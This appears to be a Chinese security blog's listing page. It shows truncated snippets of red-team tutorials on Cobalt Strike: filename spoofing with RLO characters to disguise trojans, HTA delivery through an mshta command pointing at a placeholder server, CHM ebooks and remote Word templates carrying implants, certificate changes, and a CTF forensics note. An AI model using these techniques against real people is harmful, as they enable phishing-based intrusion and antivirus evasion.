qq_50854662的博客

CVE-2022-39197 POC(CobaltStrike XSS ＜=4.7)漏洞复现

解决HTTPS-SSL通讯被朔源IP封锁问题

红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)

cdn

修改cs特征

本文内容涉及程序/技术原理可能带有攻击性，仅用于安全研究和教学使用，务必在模拟环境下进行实验，请勿将其用于其他用途。因此造成的后果自行承担，如有违反国家法律则自行承担全部法律责任，与作者及分享者无关 0x01 件名反转 在渗透过程中，有时需要通过钓鱼来来传播一些木马文件，而这些木马文件需要精心的伪装。RLO即 Start Of Right-to-Left override。我们可以通过选择插入Unicode控制字符RLO来达到反转文件名的效果 以CobaltStrike生成的木马BypassA.

 cobaltstrike.store是cobalt strike的证书文件，CS是java编写的，修改证书需要Java环境，搜索keytool,把证书复制到该目录进行操作，需要cmd以管理员权限才能生成成功。 证书默认密码：123456 查看证书指纹： keytool -list -v -keystore cobaltstrike.store 生成证书指纹： ke...

步骤:1、生成：Attacks -> Packages -> Html Application2、上传：Attacks——>Web Drive by——>Host file3、执行：C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext4、伪装：-创建快捷方式-生成HTA并上传-属性更改目标执行-属性更改图标伪装

电子书-CHM-加载JS&PS-上线CS1.对CS进行设置 服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码     2.对当前.CHM电子书进行解压    进入文件后选择任意文件夹进入 3.这里演示：进入-设备管理-打开setleds.html 4.把CS生成的利用代码插入到body里面去 利用代码： <OBJECT i

原理 将直接加载远程带有宏的恶意模版使用。 缺点 目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github)，受害者可能在文件打开一半的时候强制关闭word。优点 因为是远程加载，所以免杀效果十分不错。基本不会被杀毒软件拦截。 实现 第一步：制作一个恶意的模版并确保能够上线 这里以cs的宏木马为例。 获取到恶意的VB代码后打开word，在工具栏的空白区域右键，点击自定义功能区 勾选开发工具选项。 此时就会出现开发工具这一栏 此时点击Visual ba

拿到的是两个东西 我们先看secret.log 很多乱码但是有一串16进制数 把这段复制下来，我们放到HxD看 点击新建，直接粘贴 发现不对，观察头部，发现少了一个数（5） 因为加上5就是一个rar头部 即 导出来，改成ya.rar 要密码 我们看password.pcapng 输入过滤找post 有些很奇怪的东西 查询后知道这是jsfuck加密 先点击追踪符 然后再选tcp流 这么个东西 直接sava到桌面，后缀就用txt 拉倒jsfuck部分 中间有奇怪的乱码